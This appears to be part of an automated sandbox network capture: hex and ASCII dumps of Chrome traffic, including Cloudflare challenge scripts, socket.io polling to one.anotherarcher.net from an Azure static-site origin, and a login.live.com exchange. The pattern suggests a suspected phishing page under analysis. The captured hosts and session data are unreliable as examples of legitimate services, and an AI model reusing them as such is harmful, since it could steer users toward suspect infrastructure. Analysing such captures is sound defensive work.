                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                2024-10-03 20:57:08 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                33192.168.2.44979179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB126&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC175INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:09 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                34192.168.2.44979479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB0jB&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:09 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                35192.168.2.44979340.126.31.69443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                2024-10-03 20:57:10 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                Expires: Thu, 03 Oct 2024 20:56:09 GMT
                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30374.3
                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                x-ms-route-info: C517_BL2
                                                                                                                                                                                                                                x-ms-request-id: 7b5e5b66-3f9c-4cfe-a337-63c49284a5a0
                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF0001D7C7 V: 0
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:10 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 11409
                                                                                                                                                                                                                                2024-10-03 20:57:10 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                36192.168.2.449795104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7c5dee932f4&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:09 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 112407
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7cc7befc35e-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC1369INData Raw: 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25
                                                                                                                                                                                                                                Data Ascii: tion%3C%2Fa%3E","turnstile_expired":"Expired","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC1369INData Raw: 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 32 35 37 31 36 32 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 36 37 35 29 5d 2c 65 4f 3d 5b 5d 2c 65 50 3d 30 3b 32 35 36 3e 65 50 3b 65 4f 5b 65 50 5d 3d 53 74 72 69 6e 67 5b 67 49 28 38 36 36 29 5d 28 65 50 29 2c 65 50 2b 2b 29 3b 65 51 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 38 39 32 29 29 2c 65 52 3d 61 74 6f 62 28 67 49 28 35 32 31 29 29 2c 65 4d 5b 67 49 28 38 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 64 2c 63 2c 64 2c 65 29 7b 68 64 3d 67 49 2c 63 3d 7b 27 4d 67 57 78 56 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 28 67 29 7d 2c
                                                                                                                                                                                                                                Data Ascii: else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,257162),eM=this||self,eN=eM[gI(675)],eO=[],eP=0;256>eP;eO[eP]=String[gI(866)](eP),eP++);eQ=(0,eval)(gI(892)),eR=atob(gI(521)),eM[gI(848)]=function(hd,c,d,e){hd=gI,c={'MgWxV':function(f,g){return f(g)},
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC1369INData Raw: 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 65 28 31 33 30 33 29 5d 5b 68 65 28 38 35 36 29 5d 2c 27 63 6f 64 65 27 3a 68 65 28 31 30 31 34 29 2c 27 72 63 56 27 3a 65 4d 5b 68 65 28 31 33 30 33 29 5d 5b 68 65 28 31 33 37 33 29 5d 7d 2c 27 2a 27 29 29 3b 65 6c 73 65 20 66 6f 72 28 68 3d 66 5b 68 65 28 32 33 39 29 5d 5b 68 65 28 35 38 31 29 5d 28 27 7c 27 29 2c 69 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 68 5b 69 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 47 3d 66 5b 68 65 28 39 31 35 29 5d 28 48 2c 74 68 69 73 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 51 3d 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 66 6f 72 28 4a 3d 30 3b 66 5b 68 65 28 31 31 32 39 29 5d 28 4b 2c 4c 29 3b 4e 2b 3d 4f 5b 66 5b 68 65 28 31 34 36 31 29
                                                                                                                                                                                                                                Data Ascii: cfChlOutS':eM[he(1303)][he(856)],'code':he(1014),'rcV':eM[he(1303)][he(1373)]},'*'));else for(h=f[he(239)][he(581)]('|'),i=0;!![];){switch(h[i++]){case'0':G=f[he(915)](H,this);continue;case'1':Q='';continue;case'2':for(J=0;f[he(1129)](K,L);N+=O[f[he(1461)
                                                                                                                                                                                                                                2024-10-03 20:57:09 UTC1369INData Raw: 33 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 6c 28 31 33 30 33 29 5d 5b 68 6c 28 35 31 30 29 5d 29 2b 27 2f 27 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 6e 5b 68 6c 28 35 35 34 29 5d 28 6f 2c 44 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 6e 5b 68 6c 28 34 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 78 3d 67 44 5b 68 6c 28 31 33 33 36 29 5d 28 47 29 5b 68 6c 28 31 35 31 38 29 5d 28 27 2b 27 2c 68 6c 28 31 32 30 32 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 43 3d 28 42 3d 7b 7d 2c 42 5b 68 6c 28 34 33 37 29 5d 3d 65 4d 5b 68 6c 28 31 33 30 33 29 5d 5b 68 6c 28 34 33 37 29 5d 2c 42 5b 68 6c 28 33 35 37 29 5d 3d 65 4d 5b 68 6c 28 31 33 30
                                                                                                                                                                                                                                Data Ascii: 3)]('h/',eM[hl(1303)][hl(510)])+'/':'';continue;case'5':n[hl(554)](o,D,!![]);continue;case'6':n[hl(460)]=function(){};continue;case'7':x=gD[hl(1336)](G)[hl(1518)]('+',hl(1202));continue;case'8':C=(B={},B[hl(437)]=eM[hl(1303)][hl(437)],B[hl(357)]=eM[hl(130
